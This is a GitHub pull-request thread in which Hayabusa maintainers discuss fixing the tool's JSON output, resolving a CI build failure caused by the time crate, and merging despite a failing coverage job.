>     "PGUID": 2584,
>     "ParentPID": "365ABB72-3D4A-5CEB-0000-0010FA93FD00",
>     "ParentPGUID": "Application Server Command Line Admin Tool",
>     "Description": "Internet Information Services",
>     "Product": "Microsoft Corporation",
>     "Company": "SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45"
>   }
> ```

YamatoSecurity commented:
@hitenkoku Sorry for the late reply! Thanks again for the PR update but unfortunately there are new problems again now. We may need to consider refactoring the JSON output. Let's talk about it at Thursday's meeting.

hitenkoku commented:
@YamatoSecurity  I apologize for not being able to fix the problem, even though you have confirmed it many times.
I will confirm the logic for the JSON output at Thursday's meeting.

YamatoSecurity reviewed (approved):
@hitenkoku I checked the refactor PR and merged it because it was working well.
It seems there are some conflicts. Could you merge this after fixing the conflicts?

hitenkoku commented:
@YamatoSecurity I checked CI error. This error was caused by time crate in hayabusa-evtx.
I requested by https://github.com/Yamato-Security/hayabusa-evtx/pull/39 .

Could you check it?

```
   Compiling time v0.3.28
error[E0557]: feature has been removed
  --> /home/runner/.cargo/registry/src/index.crates.io-6f17d22bba15001f/time-0.3.28/src/lib.rs:79:39
   |
79 | #![cfg_attr(coverage_nightly, feature(no_coverage))]
   |                                       ^^^^^^^^^^^ feature has been removed
   |
   = note: renamed to `coverage_attribute`

For more information about this error, try `rustc --explain E0557`.
```

YamatoSecurity commented:
@hitenkoku Thanks for fixing this. I approved the hayabusa-evtx PR so you can merge it.

hitenkoku commented:
@YamatoSecurity  Thanks for your check! But CI stopped by same reason 🤔 
I pull requested in time crate. 

https://github.com/time-rs/time/issues/619

hitenkoku commented:
CI's coverage has an error, but we will merge for the following reason.

It has been approved by @YamatoSecurity via chat.

- The reason why it is failing is due to the influence of other libraries when obtaining coverage.
- The test in CI has passed, and there is no problem in terms of functionality.
